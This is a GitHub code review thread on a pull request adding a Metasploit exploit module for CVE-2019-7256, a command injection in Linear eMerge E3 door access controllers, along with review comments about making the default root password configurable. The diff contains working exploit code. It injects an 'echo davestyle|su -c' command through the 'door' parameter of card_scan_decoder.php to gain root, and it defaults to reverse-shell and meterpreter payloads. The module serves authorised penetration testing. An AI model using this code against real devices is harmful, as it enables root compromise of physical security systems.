modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb

```diff
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # Default root password on a Linear eMerge E3 access controller
+  ROOT_PWD = 'davestyle'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Linear eMerge E3 Access Controller Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in the Linear eMerge
+          E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
+          function allowing arbitrary command execution with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2019-7256'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
+          [ 'URL', 'https://www.nortekcontrol.com' ],
+          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
+          [ 'PACKETSTORM', '155256']
+        ],
+        'DisclosureDate' => '2019-10-29',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    random_no = rand(30..100)
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),
+      'vars_get' =>
+        {
+          'No' => random_no,
+          'door' => "`echo #{ROOT_PWD}|su -c \"#{cmd}\"`"
```

Comment:
You are assuming here that the root password is never changed on the target device. What if it is and we know the password? The current module gives you no way to change this; your stuck with the `davestyle` root password or the entire module goes bust on this part of the code.

Reply:
Good point. I added an option `ROOT_PASSWORD` with a preset value of `davestyle` which can be changed if needed. See https://github.com/rapid7/metasploit-framework/pull/17312/commits/008ba5334b2aeea230933567d1b7503232a016b5

Reply:
Looks good and this configurability is what I was after :) Only thing you forgot to do is add this into the `# Options` section of the documentation file, but I can go ahead and do that for ya 👍

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/17312/commits/bce867262c2535cb79d90ea2c70ab28527742494